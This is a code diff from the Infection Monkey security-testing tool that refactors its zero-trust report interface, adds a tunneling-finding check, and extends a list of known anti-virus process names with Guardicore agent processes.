test=TEST_DATA_ENDPOINT_ELASTIC,
|
||||
status=found_elastic_search_server,
|
||||
events=events
|
||||
)
|
||||
|
||||
Finding.save_finding(
|
||||
test=TEST_MALICIOUS_ACTIVITY_TIMELINE,
|
||||
status=STATUS_INCONCLUSIVE,
|
||||
events=events
|
||||
)
|
||||
add_malicious_activity_to_timeline(events)
|
||||
|
|
|
@ -65,5 +65,23 @@ ANTI_VIRUS_KNOWN_PROCESS_NAMES = [
|
|||
u"DWHWizrd.exe",
|
||||
u"RtvStart.exe",
|
||||
u"roru.exe",
|
||||
u"WSCSAvNotifier"
|
||||
u"WSCSAvNotifier",
|
||||
# Guardicore Centra
|
||||
# Linux
|
||||
u"gc-agents-service",
|
||||
u"gc-guest-agent",
|
||||
u"gc-guardig",
|
||||
u"gc-digger",
|
||||
u"gc-fastpath",
|
||||
u"gc-enforcement-agent",
|
||||
u"gc-enforcement-channel",
|
||||
u"gc-detection-agent",
|
||||
# Windows
|
||||
u"gc-guest-agent.exe",
|
||||
u"gc-windig.exe",
|
||||
u"gc-digger.exe",
|
||||
u"gc-fastpath.exe",
|
||||
u"gc-enforcement-channel.exe",
|
||||
u"gc-enforcement-agent.exe",
|
||||
u"gc-agent-ui.exe"
|
||||
]
|
||||
|
|
|
@ -1,6 +1,7 @@
|
|||
from common.data.zero_trust_consts import *
|
||||
from monkey_island.cc.models import Monkey
|
||||
from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline
|
||||
from monkey_island.cc.models.zero_trust.event import Event
|
||||
from monkey_island.cc.models.zero_trust.finding import Finding
|
||||
|
||||
|
||||
def test_machine_exploited(current_monkey, exploit_successful, exploiter, target_ip, timestamp):
|
||||
|
@ -28,13 +29,11 @@ def test_machine_exploited(current_monkey, exploit_successful, exploiter, target
|
|||
timestamp=timestamp)
|
||||
)
|
||||
status = STATUS_FAILED
|
||||
Finding.save_finding(
|
||||
|
||||
AggregateFinding.create_or_add_to_existing(
|
||||
test=TEST_MACHINE_EXPLOITED,
|
||||
status=status,
|
||||
events=events
|
||||
)
|
||||
Finding.save_finding(
|
||||
test=TEST_MALICIOUS_ACTIVITY_TIMELINE,
|
||||
status=STATUS_INCONCLUSIVE,
|
||||
events=events
|
||||
)
|
||||
|
||||
add_malicious_activity_to_timeline(events)
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
from common.data.zero_trust_consts import TEST_TUNNELING, STATUS_FAILED, EVENT_TYPE_MONKEY_NETWORK
|
||||
from monkey_island.cc.models import Monkey
|
||||
from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline
|
||||
from monkey_island.cc.models.zero_trust.event import Event
|
||||
from monkey_island.cc.services.telemetry.processing.utils import get_tunnel_host_ip_from_proxy_field
|
||||
|
||||
|
||||
def test_tunneling_violation(tunnel_telemetry_json):
|
||||
if tunnel_telemetry_json['data']['proxy'] is not None:
|
||||
# Monkey is tunneling, create findings
|
||||
tunnel_host_ip = get_tunnel_host_ip_from_proxy_field(tunnel_telemetry_json)
|
||||
current_monkey = Monkey.get_single_monkey_by_guid(tunnel_telemetry_json['monkey_guid'])
|
||||
tunneling_events = [Event.create_event(
|
||||
title="Tunneling event",
|
||||
message="Monkey on {hostname} tunneled traffic through {proxy}.".format(
|
||||
hostname=current_monkey.hostname, proxy=tunnel_host_ip),
|
||||
event_type=EVENT_TYPE_MONKEY_NETWORK,
|
||||
timestamp=tunnel_telemetry_json['timestamp']
|
||||
)]
|
||||
|
||||
AggregateFinding.create_or_add_to_existing(
|
||||
test=TEST_TUNNELING,
|
||||
status=STATUS_FAILED,
|
||||
events=tunneling_events
|
||||
)
|
||||
|
||||
add_malicious_activity_to_timeline(tunneling_events)
|
|
@ -104,6 +104,7 @@
|
|||
"react-tooltip-lite": "^1.9.1",
|
||||
"redux": "^4.0.0",
|
||||
"sass-loader": "^7.1.0",
|
||||
"sha3": "^2.0.0"
|
||||
"sha3": "^2.0.0",
|
||||
"pluralize": "^7.0.0"
|
||||
}
|
||||
}
|
||||
|
|
|
@ -29,6 +29,8 @@ let infectionMonkeyImage = require('../images/infection-monkey.svg');
|
|||
let guardicoreLogoImage = require('../images/guardicore-logo.png');
|
||||
let notificationIcon = require('../images/notification-logo-512x512.png');
|
||||
|
||||
const reportZeroTrustRoute = '/report/zero_trust';
|
||||
|
||||
class AppComponent extends AuthComponent {
|
||||
updateStatus = () => {
|
||||
this.auth.loggedIn()
|
||||
|
@ -200,7 +202,7 @@ class AppComponent extends AuthComponent {
|
|||
{this.renderRoute('/infection/telemetry', <TelemetryPage onStatusChange={this.updateStatus}/>)}
|
||||
{this.renderRoute('/start-over', <StartOverPage onStatusChange={this.updateStatus}/>)}
|
||||
{this.renderRoute('/report/security', <ReportPage onStatusChange={this.updateStatus}/>)}
|
||||
{this.renderRoute('/report/zero_trust', <ZeroTrustReportPage onStatusChange={this.updateStatus}/>)}
|
||||
{this.renderRoute(reportZeroTrustRoute, <ZeroTrustReportPage onStatusChange={this.updateStatus}/>)}
|
||||
{this.renderRoute('/license', <LicensePage onStatusChange={this.updateStatus}/>)}
|
||||
</Col>
|
||||
</Row>
|
||||
|
@ -210,10 +212,11 @@ class AppComponent extends AuthComponent {
|
|||
}
|
||||
|
||||
showInfectionDoneNotification() {
|
||||
if (this.state.completedSteps.infection_done) {
|
||||
let hostname = window.location.hostname;
|
||||
let url = `https://${hostname}:5000/report`;
|
||||
console.log("Trying to show notification. URL: " + url + " | icon: " + notificationIcon);
|
||||
if (this.shouldShowNotification()) {
|
||||
const hostname = window.location.hostname;
|
||||
const port = window.location.port;
|
||||
const protocol = window.location.protocol;
|
||||
const url = `${protocol}//${hostname}:${port}${reportZeroTrustRoute}`;
|
||||
|
||||
Notifier.start(
|
||||
"Monkey Island",
|
||||
|
@ -222,6 +225,11 @@ class AppComponent extends AuthComponent {
|
|||
notificationIcon);
|
||||
}
|
||||
}
|
||||
|
||||
shouldShowNotification() {
|
||||
// No need to show the notification to redirect to the report if we're already in the report page
|
||||
return (this.state.completedSteps.infection_done && !window.location.pathname.startsWith("/report"));
|
||||
}
|
||||
}
|
||||
|
||||
AppComponent.defaultProps = {};
|
||||
|
|
|
@ -8,7 +8,7 @@ import PrintReportButton from "../report-components/common/PrintReportButton";
|
|||
import {extractExecutionStatusFromServerResponse} from "../report-components/common/ExecutionStatus";
|
||||
import SummarySection from "../report-components/zerotrust/SummarySection";
|
||||
import FindingsSection from "../report-components/zerotrust/FindingsSection";
|
||||
import RecommendationsSection from "../report-components/zerotrust/RecommendationsSection";
|
||||
import PrinciplesSection from "../report-components/zerotrust/PrinciplesSection";
|
||||
|
||||
class ZeroTrustReportPageComponent extends AuthComponent {
|
||||
|
||||
|
@ -72,8 +72,8 @@ class ZeroTrustReportPageComponent extends AuthComponent {
|
|||
} else {
|
||||
content = <div id="MainContentSection">
|
||||
<SummarySection allMonkeysAreDead={this.state.allMonkeysAreDead} pillars={this.state.pillars}/>
|
||||
<RecommendationsSection recommendations={this.state.recommendations}
|
||||
pillarsToStatuses={this.state.pillars.pillarsToStatuses}/>
|
||||
<PrinciplesSection principles={this.state.principles}
|
||||
pillarsToStatuses={this.state.pillars.pillarsToStatuses}/>
|
||||
<FindingsSection pillarsToStatuses={this.state.pillars.pillarsToStatuses} findings={this.state.findings}/>
|
||||
</div>;
|
||||
}
|
||||
|
@ -102,7 +102,7 @@ class ZeroTrustReportPageComponent extends AuthComponent {
|
|||
stillLoadingDataFromServer() {
|
||||
return typeof this.state.findings === "undefined"
|
||||
|| typeof this.state.pillars === "undefined"
|
||||
|| typeof this.state.recommendations === "undefined";
|
||||
|| typeof this.state.principles === "undefined";
|
||||
}
|
||||
|
||||
getZeroTrustReportFromServer() {
|
||||
|
@ -114,11 +114,11 @@ class ZeroTrustReportPageComponent extends AuthComponent {
|
|||
findings: res
|
||||
});
|
||||
});
|
||||
this.authFetch('/api/report/zero_trust/recommendations')
|
||||
this.authFetch('/api/report/zero_trust/principles')
|
||||
.then(res => res.json())
|
||||
.then(res => {
|
||||
this.setState({
|
||||
recommendations: res
|
||||
principles: res
|
||||
});
|
||||
});
|
||||
this.authFetch('/api/report/zero_trust/pillars')
|
||||
|
|
|
@ -24,7 +24,7 @@ let renderPbaResults = function (results) {
|
|||
};
|
||||
|
||||
const subColumns = [
|
||||
{id: 'pba_name', Header: "Name", accessor: x => x.name, style: { 'whiteSpace': 'unset' }},
|
||||
{id: 'pba_name', Header: "Name", accessor: x => x.name, style: { 'whiteSpace': 'unset' }, width: 160},
|
||||
{id: 'pba_output', Header: "Output", accessor: x => renderPbaResults(x.result), style: { 'whiteSpace': 'unset' }}
|
||||
];
|
||||
|
||||
|
|
|
@ -1,9 +1,7 @@
|
|||
import React, {Component} from "react";
|
||||
import React, {Component, Fragment} from "react";
|
||||
import EventsModal from "./EventsModal";
|
||||
import {Button} from "react-bootstrap";
|
||||
import FileSaver from "file-saver";
|
||||
import {Badge, Button} from "react-bootstrap";
|
||||
import * as PropTypes from "prop-types";
|
||||
import ExportEventsButton from "./ExportEventsButton";
|
||||
|
||||
export default class EventsButton extends Component {
|
||||
constructor(props) {
|
||||
|
@ -22,18 +20,21 @@ export default class EventsButton extends Component {
|
|||
};
|
||||
|
||||
render() {
|
||||
return (
|
||||
<div>
|
||||
<EventsModal events={this.props.events} showEvents={this.state.isShow} hideCallback={this.hide} exportFilename={this.props.exportFilename} />
|
||||
return <Fragment>
|
||||
<EventsModal events={this.props.events} showEvents={this.state.isShow} hideCallback={this.hide}
|
||||
exportFilename={this.props.exportFilename}/>
|
||||
<div className="text-center" style={{"display": "grid"}}>
|
||||
<Button className="btn btn-primary btn-lg" onClick={this.show}>
|
||||
<i className="fa fa-list"/> Events
|
||||
<i className="fa fa-list"/> Events {this.createEventsAmountBadge()}
|
||||
</Button>
|
||||
</div>
|
||||
</div>
|
||||
);
|
||||
</Fragment>;
|
||||
}
|
||||
|
||||
createEventsAmountBadge() {
|
||||
const eventsAmountBadgeContent = this.props.events.length > 9 ? "9+" : this.props.events.length;
|
||||
return <Badge>{eventsAmountBadgeContent}</Badge>;
|
||||
}
|
||||
}
|
||||
|
||||
EventsButton.propTypes = {
|
||||
|
|
|
@ -1,9 +1,11 @@
|
|||
import React, {Component} from "react";
|
||||
import {Modal} from "react-bootstrap";
|
||||
import {Badge, Modal} from "react-bootstrap";
|
||||
import EventsTimeline from "./EventsTimeline";
|
||||
import * as PropTypes from "prop-types";
|
||||
import ExportEventsButton from "./ExportEventsButton";
|
||||
import saveJsonToFile from "../../utils/SaveJsonToFile";
|
||||
import EventsModalButtons from "./EventsModalButtons";
|
||||
import Pluralize from 'pluralize'
|
||||
import {statusToLabelType} from "./StatusLabel";
|
||||
|
||||
export default class EventsModal extends Component {
|
||||
constructor(props) {
|
||||
|
@ -15,28 +17,31 @@ export default class EventsModal extends Component {
|
|||
<div>
|
||||
<Modal show={this.props.showEvents} onHide={() => this.props.hideCallback()}>
|
||||
<Modal.Body>
|
||||
<h2>
|
||||
<h3>
|
||||
<div className="text-center">Events</div>
|
||||
</h2>
|
||||
|
||||
</h3>
|
||||
<hr />
|
||||
<p>
|
||||
There {Pluralize('is', this.props.events.length)} {<div className={"label label-primary"}>{this.props.events.length}</div>} {Pluralize('event', this.props.events.length)} associated with this finding.
|
||||
</p>
|
||||
{this.props.events.length > 5 ? this.renderButtons() : null}
|
||||
<EventsTimeline events={this.props.events}/>
|
||||
|
||||
<div className="text-center">
|
||||
<button type="button" className="btn btn-success btn-lg" style={{margin: '5px'}}
|
||||
onClick={() => this.props.hideCallback()}>
|
||||
Close
|
||||
</button>
|
||||
<ExportEventsButton onClick={() => {
|
||||
const dataToSave = this.props.events;
|
||||
const filename = this.props.exportFilename;
|
||||
saveJsonToFile(dataToSave, filename);
|
||||
}}/>
|
||||
</div>
|
||||
{this.renderButtons()}
|
||||
</Modal.Body>
|
||||
</Modal>
|
||||
</div>
|
||||
);
|
||||
}
|
||||
|
||||
renderButtons() {
|
||||
return <EventsModalButtons
|
||||
onClickClose={() => this.props.hideCallback()}
|
||||
onClickExport={() => {
|
||||
const dataToSave = this.props.events;
|
||||
const filename = this.props.exportFilename;
|
||||
saveJsonToFile(dataToSave, filename);
|
||||
}}/>;
|
||||
}
|
||||
}
|
||||
|
||||
EventsModal.propTypes = {
|
||||
|
|
|
@ -0,0 +1,20 @@
|
|||
import React, {Component} from "react";
|
||||
import ExportEventsButton from "./ExportEventsButton";
|
||||
import * as PropTypes from "prop-types";
|
||||
|
||||
export default class EventsModalButtons extends Component {
|
||||
render() {
|
||||
return <div className="text-center">
|
||||
<button type="button" className="btn btn-success btn-lg" style={{margin: '5px'}}
|
||||
onClick={this.props.onClickClose}>
|
||||
Close
|
||||
</button>
|
||||
<ExportEventsButton onClick={this.props.onClickExport}/>
|
||||
</div>
|
||||
}
|
||||
}
|
||||
|
||||
EventsModalButtons.propTypes = {
|
||||
onClickClose: PropTypes.func,
|
||||
onClickExport: PropTypes.func
|
||||
};
|
|
@ -14,7 +14,7 @@ export default class EventsTimeline extends Component {
|
|||
render() {
|
||||
return (
|
||||
<div>
|
||||
<Timeline>
|
||||
<Timeline style={{fontSize: '100%'}}>
|
||||
{
|
||||
this.props.events.map((event, index) => {
|
||||
const event_time = new Date(event.timestamp['$date']).toString();
|
||||
|
@ -22,7 +22,6 @@ export default class EventsTimeline extends Component {
|
|||
key={index}
|
||||
createdAt={event_time}
|
||||
title={event.title}
|
||||
|
||||
icon={<img src={eventTypeToIcon[event.event_type]} alt="icon" style={{width: '24px'}} />}>
|
||||
{event.message}
|
||||
</TimelineEvent>)
|
||||
|
|
|
@ -35,7 +35,7 @@ class FindingsSection extends Component {
|
|||
</p>
|
||||
|
||||
<FindingsTable data={findingsByStatus[ZeroTrustStatuses.failed]} status={ZeroTrustStatuses.failed}/>
|
||||
<FindingsTable data={findingsByStatus[ZeroTrustStatuses.inconclusive]} status={ZeroTrustStatuses.inconclusive}/>
|
||||
<FindingsTable data={findingsByStatus[ZeroTrustStatuses.verify]} status={ZeroTrustStatuses.verify}/>
|
||||
<FindingsTable data={findingsByStatus[ZeroTrustStatuses.passed]} status={ZeroTrustStatuses.passed}/>
|
||||
</div>
|
||||
);
|
||||
|
|
|
@ -0,0 +1,31 @@
|
|||
import React, {Component} from "react";
|
||||
import SinglePillarPrinciplesStatus from "./SinglePillarPrinciplesStatus";
|
||||
import * as PropTypes from "prop-types";
|
||||
|
||||
export default class PrinciplesSection extends Component {
|
||||
render() {
|
||||
return <div id="principles-section">
|
||||
<h2>Test Results</h2>
|
||||
<p>
|
||||
The <a href="https://www.forrester.com/report/The+Zero+Trust+eXtended+ZTX+Ecosystem/-/E-RES137210">
|
||||
Zero Trust eXtended (ZTX) framework
|
||||
</a> is composed of 7 pillars. Each pillar is built of
|
||||
several guiding principles tested by the Infection Monkey.
|
||||
</p>
|
||||
{
|
||||
Object.keys(this.props.principles).map((pillar) =>
|
||||
<SinglePillarPrinciplesStatus
|
||||
key={pillar}
|
||||
pillar={pillar}
|
||||
principlesStatus={this.props.principles[pillar]}
|
||||
pillarsToStatuses={this.props.pillarsToStatuses}/>
|
||||
)
|
||||
}
|
||||
</div>
|
||||
}
|
||||
}
|
||||
|
||||
PrinciplesSection.propTypes = {
|
||||
principles: PropTypes.object,
|
||||
pillarsToStatuses: PropTypes.object
|
||||
};
|
|
@ -16,7 +16,7 @@ const columns = [
|
|||
},
|
||||
maxWidth: MAX_WIDTH_STATUS_COLUMN
|
||||
},
|
||||
{ Header: 'ZT Recommendation', accessor: 'recommendation',
|
||||
{ Header: 'Zero Trust Principle', accessor: 'principle',
|
||||
style: {'whiteSpace': 'unset'} // This enables word wrap
|
||||
},
|
||||
{ Header: 'Monkey Tests', id: 'tests',
|
||||
|
@ -34,7 +34,7 @@ class TestsStatus extends AuthComponent {
|
|||
return (
|
||||
<Fragment>
|
||||
{this.getFilteredTestsByStatusIfAny(ZeroTrustStatuses.failed)}
|
||||
{this.getFilteredTestsByStatusIfAny(ZeroTrustStatuses.inconclusive)}
|
||||
{this.getFilteredTestsByStatusIfAny(ZeroTrustStatuses.verify)}
|
||||
{this.getFilteredTestsByStatusIfAny(ZeroTrustStatuses.passed)}
|
||||
{this.getFilteredTestsByStatusIfAny(ZeroTrustStatuses.unexecuted)}
|
||||
</Fragment>
|
||||
|
@ -60,12 +60,12 @@ class TestsStatus extends AuthComponent {
|
|||
}
|
||||
}
|
||||
|
||||
export class RecommendationsStatusTable extends AuthComponent {
|
||||
export class PrinciplesStatusTable extends AuthComponent {
|
||||
render() {
|
||||
return <PaginatedTable data={this.props.recommendationsStatus} columns={columns} pageSize={5}/>;
|
||||
return <PaginatedTable data={this.props.principlesStatus} columns={columns} pageSize={5}/>;
|
||||
}
|
||||
}
|
||||
|
||||
export default RecommendationsStatusTable;
|
||||
export default PrinciplesStatusTable;
|
||||
|
||||
RecommendationsStatusTable.propTypes = {recommendationsStatus: PropTypes.array};
|
||||
PrinciplesStatusTable.propTypes = {principlesStatus: PropTypes.array};
|
|
@ -1,29 +0,0 @@
|
|||
import React, {Component} from "react";
|
||||
import SinglePillarRecommendationsStatus from "./SinglePillarRecommendationsStatus";
|
||||
import * as PropTypes from "prop-types";
|
||||
|
||||
export default class RecommendationsSection extends Component {
|
||||
render() {
|
||||
return <div id="recommendations-section">
|
||||
<h2>Recommendations</h2>
|
||||
<p>
|
||||
Analyze each zero trust recommendation by pillar, and see if you've followed through with it. See test results
|
||||
to understand how the monkey tested your adherence to that recommendation.
|
||||
</p>
|
||||
{
|
||||
Object.keys(this.props.recommendations).map((pillar) =>
|
||||
<SinglePillarRecommendationsStatus
|
||||
key={pillar}
|
||||
pillar={pillar}
|
||||
recommendationsStatus={this.props.recommendations[pillar]}
|
||||
pillarsToStatuses={this.props.pillarsToStatuses}/>
|
||||
)
|
||||
}
|
||||
</div>
|
||||
}
|
||||
}
|
||||
|
||||
RecommendationsSection.propTypes = {
|
||||
recommendations: PropTypes.object,
|
||||
pillarsToStatuses: PropTypes.object
|
||||
};
|
|
@ -27,35 +27,32 @@ class ZeroTrustReportLegend extends Component {
|
|||
|
||||
getLegendContent() {
|
||||
return <div id={this.constructor.name}>
|
||||
<h4>Statuses</h4>
|
||||
<ul style={{listStyle: "none"}}>
|
||||
<li>
|
||||
<div style={{display: "inline-block"}}>
|
||||
<StatusLabel showText={true} status={ZeroTrustStatuses.failed}/>
|
||||
</div>
|
||||
{"\t"}Some tests failed; the monkeys found something wrong.
|
||||
{"\t"}At least one of the tests related to this component failed. This means that the Infection Monkey detected an unmet Zero Trust requirement.
|
||||
</li>
|
||||
<li>
|
||||
<div style={{display: "inline-block"}}>
|
||||
<StatusLabel showText={true} status={ZeroTrustStatuses.inconclusive}/>
|
||||
<StatusLabel showText={true} status={ZeroTrustStatuses.verify}/>
|
||||
</div>
|
||||
{"\t"}The test ran; manual verification is required to determine the results.
|
||||
{"\t"}At least one of the tests’ results related to this component requires further manual verification.
|
||||
</li>
|
||||
<li>
|
||||
<div style={{display: "inline-block"}}>
|
||||
<StatusLabel showText={true} status={ZeroTrustStatuses.passed}/>
|
||||
</div>
|
||||
{"\t"}The test passed, so this is OK 🙂
|
||||
{"\t"}All Tests related to this pillar passed. No violation of a Zero Trust guiding principle was detected.
|
||||
</li>
|
||||
<li>
|
||||
<div style={{display: "inline-block"}}>
|
||||
<StatusLabel showText={true} status={ZeroTrustStatuses.unexecuted}/>
|
||||
</div>
|
||||
{"\t"}This status means the test wasn't executed.
|
||||
{"\t"}This status means the test wasn't executed.To activate more tests, refer to the Monkey <NavLink to="/configuration"><u>configuration</u></NavLink> page.
|
||||
</li>
|
||||
</ul>
|
||||
<hr />
|
||||
Some of the tests can be activated using the <NavLink to="/configuration"><u>configuration</u></NavLink>.
|
||||
</div>;
|
||||
}
|
||||
}
|
||||
|
|
|
@ -1,13 +1,13 @@
|
|||
import AuthComponent from "../../AuthComponent";
|
||||
import PillarLabel from "./PillarLabel";
|
||||
import RecommendationsStatusTable from "./RecommendationsStatusTable";
|
||||
import PrinciplesStatusTable from "./PrinciplesStatusTable";
|
||||
import React from "react";
|
||||
import * as PropTypes from "prop-types";
|
||||
import {Panel} from "react-bootstrap";
|
||||
|
||||
export default class SinglePillarRecommendationsStatus extends AuthComponent {
|
||||
export default class SinglePillarPrinciplesStatus extends AuthComponent {
|
||||
render() {
|
||||
if (this.props.recommendationsStatus.length === 0) {
|
||||
if (this.props.principlesStatus.length === 0) {
|
||||
return null;
|
||||
}
|
||||
else {
|
||||
|
@ -22,7 +22,7 @@ export default class SinglePillarRecommendationsStatus extends AuthComponent {
|
|||
</Panel.Heading>
|
||||
<Panel.Collapse>
|
||||
<Panel.Body>
|
||||
<RecommendationsStatusTable recommendationsStatus={this.props.recommendationsStatus}/>
|
||||
<PrinciplesStatusTable principlesStatus={this.props.principlesStatus}/>
|
||||
</Panel.Body>
|
||||
</Panel.Collapse>
|
||||
</Panel>
|
||||
|
@ -31,7 +31,7 @@ export default class SinglePillarRecommendationsStatus extends AuthComponent {
|
|||
}
|
||||
}
|
||||
|
||||
SinglePillarRecommendationsStatus.propTypes = {
|
||||
recommendationsStatus: PropTypes.array,
|
||||
SinglePillarPrinciplesStatus.propTypes = {
|
||||
principlesStatus: PropTypes.array,
|
||||
pillar: PropTypes.string,
|
||||
};
|
|
@ -3,14 +3,14 @@ import * as PropTypes from "prop-types";
|
|||
|
||||
const statusToIcon = {
|
||||
"Passed": "fa-check",
|
||||
"Inconclusive": "fa-exclamation-triangle",
|
||||
"Verify": "fa-exclamation-triangle",
|
||||
"Failed": "fa-bomb",
|
||||
"Unexecuted": "fa-question",
|
||||
};
|
||||
|
||||
export const statusToLabelType = {
|
||||
"Passed": "label-success",
|
||||
"Inconclusive": "label-warning",
|
||||
"Verify": "label-warning",
|
||||
"Failed": "label-danger",
|
||||
"Unexecuted": "label-default",
|
||||
};
|
||||
|
|
|
@ -8,7 +8,7 @@ export default class StatusesToPillarsSummary extends Component {
|
|||
render() {
|
||||
return (<div id="piilar-summary">
|
||||
{this.getStatusSummary(ZeroTrustStatuses.failed)}
|
||||
{this.getStatusSummary(ZeroTrustStatuses.inconclusive)}
|
||||
{this.getStatusSummary(ZeroTrustStatuses.verify)}
|
||||
{this.getStatusSummary(ZeroTrustStatuses.passed)}
|
||||
{this.getStatusSummary(ZeroTrustStatuses.unexecuted)}
|
||||
</div>);
|
||||
|
|
|
@ -14,7 +14,9 @@ export default class SummarySection extends Component {
|
|||
<Col xs={12} sm={12} md={12} lg={12}>
|
||||
<MonkeysStillAliveWarning allMonkeysAreDead={this.props.allMonkeysAreDead}/>
|
||||
<p>
|
||||
Get a quick glance of the status for each of Zero Trust's seven pillars.
|
||||
Get a quick glance at how your network aligns with the <a href="https://www.forrester.com/report/The+Zero+Trust+eXtended+ZTX+Ecosystem/-/E-RES137210">
|
||||
Zero Trust eXtended (ZTX) framework
|
||||
</a>.
|
||||
</p>
|
||||
</Col>
|
||||
</Row>
|
||||
|
@ -27,20 +29,6 @@ export default class SummarySection extends Component {
|
|||
<ZeroTrustReportLegend/>
|
||||
</Col>
|
||||
</Row>
|
||||
<Row>
|
||||
<Col xs={12} sm={12} md={12} lg={12}>
|
||||
<h4>What am I seeing?</h4>
|
||||
<p>
|
||||
The <a href="https://www.forrester.com/report/The+Zero+Trust+eXtended+ZTX+Ecosystem/-/E-RES137210">Zero
|
||||
Trust eXtended framework</a> categorizes its <b>recommendations</b> into 7 <b>pillars</b>. Infection
|
||||
Monkey
|
||||
Zero Trust edition tests some of those recommendations. The <b>tests</b> that the monkey executes
|
||||
produce <b>findings</b>. The tests, recommendations and pillars are then granted a <b>status</b> in
|
||||
accordance
|
||||
with the tests results.
|
||||
</p>
|
||||
</Col>
|
||||
</Row>
|
||||
</Grid>
|
||||
</div>
|
||||
}
|
||||
|
|
|
@ -10,7 +10,7 @@ export const ZeroTrustPillars = {
|
|||
|
||||
export const ZeroTrustStatuses = {
|
||||
failed: "Failed",
|
||||
inconclusive: "Inconclusive",
|
||||
verify: "Verify",
|
||||
passed: "Passed",
|
||||
unexecuted: "Unexecuted"
|
||||
};
|
||||
|
|
|
@ -78,23 +78,22 @@ class VennDiagram extends React.Component {
|
|||
RULE #1: All scores have to be equal 0, except Unexecuted [U] which could be also a negative integer
|
||||
sum(C, I, P) has to be <=0
|
||||
|
||||
RULE #2: Conclusive [C] has to be > 0,
|
||||
RULE #2: Failed [C] has to be > 0,
|
||||
sum(C) > 0
|
||||
|
||||
RULE #3: Inconclusive [I] has to be > 0 while Conclusive has to be 0,
|
||||
RULE #3: Verify [I] has to be > 0 while Failed has to be 0,
|
||||
sum(C, I) > 0 and C * I = 0, while C has to be 0
|
||||
|
||||
RULE #4: By process of elimination, passed.
|
||||
if the P is bigger by 2 then negative U, first conditional
|
||||
would be true.
|
||||
|
||||
*/
|
||||
|
||||
this.rules = [
|
||||
|
||||
{
|
||||
id: 'Rule #1', status: ZeroTrustStatuses.unexecuted, hex: '#777777', f: function (d_) {
|
||||
return d_[ZeroTrustStatuses.failed] + d_[ZeroTrustStatuses.inconclusive] + d_[ZeroTrustStatuses.passed] === 0;
|
||||
return d_[ZeroTrustStatuses.failed] + d_[ZeroTrustStatuses.verify] + d_[ZeroTrustStatuses.passed] === 0;
|
||||
}
|
||||
},
|
||||
{
|
||||
|
@ -103,8 +102,8 @@ class VennDiagram extends React.Component {
|
|||
}
|
||||
},
|
||||
{
|
||||
id: 'Rule #3', status: 'Inconclusive', hex: '#F0AD4E', f: function (d_) {
|
||||
return d_[ZeroTrustStatuses.failed] === 0 && d_[ZeroTrustStatuses.inconclusive] > 0;
|
||||
id: 'Rule #3', status: ZeroTrustStatuses.verify, hex: '#F0AD4E', f: function (d_) {
|
||||
return d_[ZeroTrustStatuses.failed] === 0 && d_[ZeroTrustStatuses.verify] > 0;
|
||||
}
|
||||
},
|
||||
{
|
||||
|
|
Loading…
Reference in New Issue